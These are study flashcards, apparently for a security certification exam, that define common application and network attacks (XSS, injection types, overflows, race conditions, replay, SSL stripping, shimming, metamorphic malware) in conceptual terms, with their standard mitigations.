Analyzing Application & Network Attacks Flashcards
(Cross-site scripting)
Non-persistent (reflected) XSS attack
Web site allows scripts to run in user input
– Search box is a common source
• Attacker emails a link that takes advantage of this
vulnerability
– Runs a script that sends credentials/session IDs/cookies
to the attacker
• Script embedded in URL executes in the victim’s browser
– As if it came from the server
• Attacker uses credentials/session IDs/cookies to steal
victim’s information without their knowledge
– Very sneaky
(Cross-site scripting)
Persistent (stored) XSS attack
Is a script the persists on a website
Attacker posts a message to a social network
Includes the malicious payload
- It’s now “persistent” - Everyone gets the payload
- No specific target - All viewers to the page
• For social networking, this can spread quickly
Everyone who views the message can have it
posted to their page
– Where someone else can view it and propagate it further…
(Cross-site scripting)
Protecting against XSS
• Be careful when clicking untrusted links
– Never blindly click in your email inbox. Never.
• Consider disabling JavaScript
– Or control with an extension
– This offers limited protection
• Keep your browser and applications updated
– Avoid the nasty browser vulnerabilities
• Validate input
– Don’t allow users to add their own scripts to an
input field
Privilege escalation
Gain higher-level access to a system
– Exploit a vulnerability - Might be a bug or design flaw
• Higher-level access means more capabilities
– This commonly is the highest-level access
• These are high-priority vulnerability patches
– You want to get these holes closed very quickly
– Any user can be an administrator
• Horizontal privilege escalation
– User A can access user B resources
Mitigating privilege escalation
Patch quickly
– Fix the vulnerability
• Updated anti-virus/anti-malware software
• Data Execution Prevention – Only data in executable areas can run • Address space layout randomization – Prevent a buffer overrun at a known memory address
Injection Attacks
Code injection
SQL injection
XML injection and LDAP injection
DLL injection
DLL injection
• Dynamic-Link Library
– A Windows library containing code and data
– Many applications can use this library
• Inject a DLL and have an application run a program
– Runs as part of the target process
XML injection and LDAP injection
XML - Extensible Markup Language
–AKA Soap injection
Are attacks that target XML data stores by injecting
malicious XML and XPath code into a user
Controllable input-
Occurs when user Input is inserted unsafely
XML metacharacters can be used to modify
-Performs unauthorized task
• LDAP Injection - Lightweight Directory Access Protocol
Is often used in web applications over the internet or a corporate intranet
-The web application takes the input from the client in order to process it further, so the attacker exploits data not being properly sanitized or going directly to a back end database
• LDAP injection
– Modify LDAP requests to manipulate application results
Code injection
Code injection – Adding your own information into a data stream • Enabled because of bad programming – The application should properly handle input and output • So many different data types – HTML, SQL, XML, LDAP, etc.
(Coding Attacks)
NULL Pointer dereference
Programming technique that references a
portion of memory
-A null-pointer dereference occurs when a pointer with a value of NULL is used as if it actually points to a valid memory area
– What happens if that reference points to nothing?
– Application crash, debug information displayed, DoS
(Coding Attacks)
Directory traversal
Directory traversal / path traversal – Read files from a web server that are outside of the website’s file directory – Users shouldn’t be able to browse the Windows folder • Web server software vulnerability – Won’t stop users from browsing past the web server root • Web application code vulnerability – Take advantage of badly written code
(Coding Attacks)
Buffer overflows
Overwriting a buffer of memory
– Spills over into other memory areas
• Developers need to perform bounds checking
– The attackers spend a lot of time looking for openings
• Not a simple exploit
– Takes time to avoid crashing things
– Takes time to make it do what you want
• A really useful buffer overflow is repeatable
– Which means that a system can be compromised
(Coding Attacks)
Integer overflow
Large number into a smaller sized space
– Where does the extra number go?
– You shouldn’t be able to manipulate
memory this way
(Coding Attacks)
Race Conditions
A programming conundrum
– Sometimes, things happen at the same time
– This can be bad if you’ve not planned for it
• Time-of-check to time-of-use attack (TOCTOU)
– Check the system
– When do you use the results of your last check?
– Something might happen between the check
and the use
(Coding Attacks)
Improper error handling
Errors happen – And you should probably know about it Messages should be just informational enough – Avoid too much detail – Network information, memory dump, stack traces, database dumps • This is an easy one to find and fix – A development best-practice
Improper input handling
Many applications accept user input
– We put data in, we get data back
• All input should be considered malicious
– Check everything. Trust nobody.
• Allowing invalid input can be devastating
– SQL injections, buffer overflows,
denial of service, etc.
• It takes a lot of work to find input that
can be used maliciously
– But they will find it
Replay Attacks
– Replay the data to appear as someone else
This is not an on-path attack
– The actual replay doesn’t require
the original workstation
• Avoid this type of replay attack with a salt
– Use a session ID with the password hash to
create a unique authentication hash each time
– A crafty hacker will take advantage of this
• Need access to the raw network data
– Network tap, ARP poisoning, malware on the victim computer
• The gathered information may help the attacker
Useful information is transmitted over the network
API attacks
API - Application Programming Interface
• Attackers look for vulnerabilities in this new
communication path
– Exposing sensitive data, DoS, intercepted
communication, privileged access
Used to enable communication between applications and end-users ranging from your car telling you where the nearest fuel station is to your phone fetching weather and sports updates
API’s
are used and no matter what devices are connected
SSL stripping / HTTP downgrade
(Secure Socket Layer) (Transport Layer Security)
Combines an on-path attack with a downgrade attack
• Attacker must sit in the middle of the conversation
– Must modify data between the victim and web server
– Proxy server, ARP spoofing, rogue Wi-Fi hotspot, etc.
• Victim does not see any significant problem
– Except the browser page isn’t encrypted
– Strips the “S” away from HTTPS, which stands for secure
• This is a client and server problem
– Works on SSL and TLS
SSL and TLS
• SSL (Secure Sockets Layer) 2.0 - Deprecated in 2011
• SSL 3.0
– Vulnerable to the POODLE attack
– Deprecated in June 2015
• Transport Layer Security (TLS) 1.0
– Upgrade to SSL 3.0, and a name change
from SSL to TLS
– Can downgrade to SSL 3.0
• TLS 1.1
– Deprecated in January 2020 by modern browsers
• TLS 1.2 and TLS 1.3 - The latest standards
Driver Manipulation exampled
Shimming
Refactoring
Shimming
Filling in the space between two objects – A middleman • Windows includes it’s own shim – Backwards compatibility with previous Windows versions – Application Compatibility Shim Cache • Malware authors write their own shims – Get around security (like UAC) • January 2015 Microsoft vulnerability – Elevates privilege
Refactoring
Metamorphic malware
– A different program each time it’s downloaded
• Make it appear different each time
– Add NOP instructions
– Loops, pointless code strings
• Can intelligently redesign itself
– Reorder functions
– Modify the application flow
– Reorder code and insert unused data types
• Difficult to match with signature-based detection
– Use a layered approach
Driver
The interaction between the hardware and your
operating system
– They are often trusted
– Great opportunity for security issues
• May 2016 - HP Audio Drivers
– Conexant audio chips
– Driver installation includes audio control software
– Debugging feature enables a keylogger
• Hardware interactions contain sensitive information
– Video, keyboard, mouse